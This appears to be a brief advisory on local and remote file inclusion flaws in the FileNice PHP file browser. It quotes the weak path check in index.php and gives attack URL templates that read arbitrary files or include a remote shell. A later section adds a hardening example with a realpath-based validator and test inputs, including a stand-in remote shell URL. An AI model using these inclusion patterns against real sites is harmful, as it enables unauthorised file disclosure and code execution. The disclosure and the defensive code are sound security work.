FileNice file browser RFI & LFI
By: e.wiZz!

###################################
Script site: http://filenice.com
In the wild...
###################################

Vulnerability: index.php

    ...
    if(isset($_GET['view'])){
        if(substr($_GET['view'],0,2) != ".." && substr($_GET['view'],0,1) != "/" && $_GET['view'] != "./" && !stristr($_GET['view'], '../')){
            $out = new FNOutput;
            $out->viewFile($_GET['view']);
        }else{
            // someone is poking around where they shouldn't be
            echo("Don't hack my shit yo.");
            exit;
        }
    }else if(isset($_GET['src'])){
        if(substr($_GET['src'],0,2) != ".." && substr($_GET['src'],0,1) != "/" && $_GET['src'] != "./" && !stristr($_GET['src'], '../')){
            $out = new FNOutput;
            $out->showSource($_GET['src']);
        }else{
            // someone is poking around where they shouldn't be
            echo("Don't hack my shit yo.");
            exit;
        }
    ...

There is a security check against directory traversal here (which can be bypassed), but there is no check at all for remote file inclusion, and you can also view the source of any file in the parent directory:

    http://inthewild/path/index.php?src=[lfi]            // index.php or whatever
    http://inthewild/path/index.php?src=[remote shell]

By the way, there are lots of other vulnerabilities... happy huntin' :)
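As an added example (not FileNice's own code and not part of the original advisory), here is how the `view`/`src` handling could be hardened instead of pattern-matching the raw string for `..` and `/`: resolve the candidate with `realpath()`, require the result to sit strictly below the browsed directory, and reject anything that looks like a URL or stream wrapper before it ever reaches a file function. The function name `resolveSafePath`, the `$baseDir` parameter and the temp-directory layout are assumptions of this example.

```php
<?php
// Added example, not FileNice's code. resolveSafePath() and $baseDir are
// names chosen for this illustration.

/**
 * Return the canonical path of $userInput inside $baseDir, or null when the
 * input escapes the directory, is not a regular file, or is a URL/wrapper.
 */
function resolveSafePath(string $baseDir, string $userInput): ?string
{
    // Reject empty input and anything with a scheme prefix (http://, ftp://,
    // php://, data:, ...): include/readfile would fetch or reinterpret those
    // instead of opening a local file. A filename such as "a:b.txt" is also
    // refused by this rule, which is an acceptable strictness here.
    if ($userInput === '' || preg_match('#^[a-z][a-z0-9+.-]*:#i', $userInput)) {
        return null;
    }
    // Embedded NUL bytes truncate paths in C-level file functions.
    if (strpos($userInput, "\0") !== false) {
        return null;
    }

    $realBase = realpath($baseDir);
    if ($realBase === false) {
        return null;
    }
    // realpath() collapses "..", symlinks and duplicate separators, so the
    // prefix comparison below is made on the path the OS will actually open.
    $candidate = realpath($realBase . DIRECTORY_SEPARATOR . $userInput);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Require the resolved path to be strictly below the base directory.
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Demonstration on a constructed directory layout under the system temp dir.
$base = sys_get_temp_dir() . '/filenice_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/docs', 0700, true);
file_put_contents($base . '/docs/readme.txt', "hello\n");
file_put_contents($base . '/outside.txt', "secret\n");

$cases = [
    'readme.txt',                   // plain file inside the browsed dir: allowed
    './',                           // the directory itself, not a file: rejected
    '../outside.txt',               // parent-directory read (the LFI case): rejected
    'http://example.invalid/shell', // remote include (the RFI case): rejected
];
foreach ($cases as $c) {
    $r = resolveSafePath($base . '/docs', $c);
    printf("%-30s => %s\n", $c, $r === null ? 'REJECTED' : 'OK ' . basename($r));
}

// Clean up the constructed layout.
unlink($base . '/docs/readme.txt');
unlink($base . '/outside.txt');
rmdir($base . '/docs');
rmdir($base);
```

The important difference from the original check is that the decision is made on the canonicalised path rather than on the user's string, so encoding tricks and symlinks are handled by the filesystem rather than by a hand-written blacklist; the scheme check in front of it is what closes the remote-include hole, since `realpath()` alone would simply return `false` for a URL but says nothing about what a later `include` would do with it.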